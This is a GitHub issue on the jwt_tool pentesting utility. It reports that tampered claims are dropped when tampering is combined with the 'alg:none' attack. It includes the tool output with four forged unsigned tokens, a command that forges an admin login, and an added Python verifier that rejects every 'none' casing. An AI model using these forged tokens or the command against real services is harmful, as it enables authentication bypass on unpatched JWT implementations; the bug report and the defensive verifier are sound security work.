tampering is ignored when combined with an attack #84

Open
noraj opened this issue Oct 8, 2022 · 1 comment


noraj commented Oct 8, 2022

When combining tamper + an attack, the output token is the original token + the attack; the tampering is ignored.

For example:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -T -X a

...

Token payload values:
[1] login = "noraj"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 1

Current value of login is: noraj
Please enter new value and hit ENTER
> admin 
[1] login = "admin"
[2] iat = 1665254583    ==> TIMESTAMP = 2022-10-08 20:43:03 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step

Please select a field number:
(or 0 to Continue)
> 0
jwttool_5f095c12269a0436e321cc1cff90399b - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e67565a408b902fbaee7f0551345ceec - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_09935cb7b6cadff540561326dd3688d1 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.
jwttool_e8a178e70ccfaab8ad7ff0ae90add944 - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIiwidHlwIjoiSldTIn0.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.

The output token contains user noraj and not admin.
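
Decoding the four tokens printed above confirms that the `login` claim is still `noraj`, and a verifier that pins its algorithm rejects every casing of `none`. This is an added example, not part of the issue or of jwt_tool's code: the header and payload segments are copied from the output above, while `DEMO_KEY` and the function names are constructed for illustration.

```python
import base64, hashlib, hmac, json

# Segments copied from the tool output above; the signature part is empty.
PAGE_PAYLOAD = "eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9"
NONE_HEADERS = [
    "eyJhbGciOiJub25lIiwidHlwIjoiSldTIn0",  # "alg":"none"
    "eyJhbGciOiJOb25lIiwidHlwIjoiSldTIn0",  # "alg":"None"
    "eyJhbGciOiJOT05FIiwidHlwIjoiSldTIn0",  # "alg":"NONE"
    "eyJhbGciOiJuT25FIiwidHlwIjoiSldTIn0",  # "alg":"nOnE"
]
NONE_TOKENS = [h + "." + PAGE_PAYLOAD + "." for h in NONE_HEADERS]
DEMO_KEY = b"constructed-demo-key"  # assumption: constructed, not from the page
ALLOWED_ALGS = {"HS256"}            # pinned by the verifier, never read from the token

def b64url_decode(seg):
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def decode_unverified(token):
    """Return (header, payload) for inspection only; nothing is trusted."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def sign_hs256(header, payload, key):
    """Build a compact HS256 token (used here only to make a valid sample)."""
    segs = [b64url_encode(json.dumps(p, separators=(",", ":")).encode())
            for p in (header, payload)]
    signing_input = ".".join(segs)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)

def verify_hs256(token, key):
    """Return the payload if the token is validly signed, else raise ValueError."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header = json.loads(b64url_decode(parts[0]))
    # Exact-match allowlist: "none", "None", "NONE" and "nOnE" all fail here.
    if not isinstance(header, dict) or header.get("alg") not in ALLOWED_ALGS:
        raise ValueError("algorithm not allowed")
    expected = hmac.new(key, (parts[0] + "." + parts[1]).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(parts[2])):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(parts[1]))
```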


noraj commented Oct 8, 2022

I know I can use this:

$ jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6Im5vcmFqIiwiaWF0IjoiMTY2NTI1NDU4MyJ9.OTgxOGE0YWE5Y2UyYTQ5N2FlMzZlZmMwZTIxOGIwOTFhZDdjOTRlYWE4MDFkMWJlOTgwN2E1NTkxMzAzMGMwYw -X a -pc login -pv admin -I
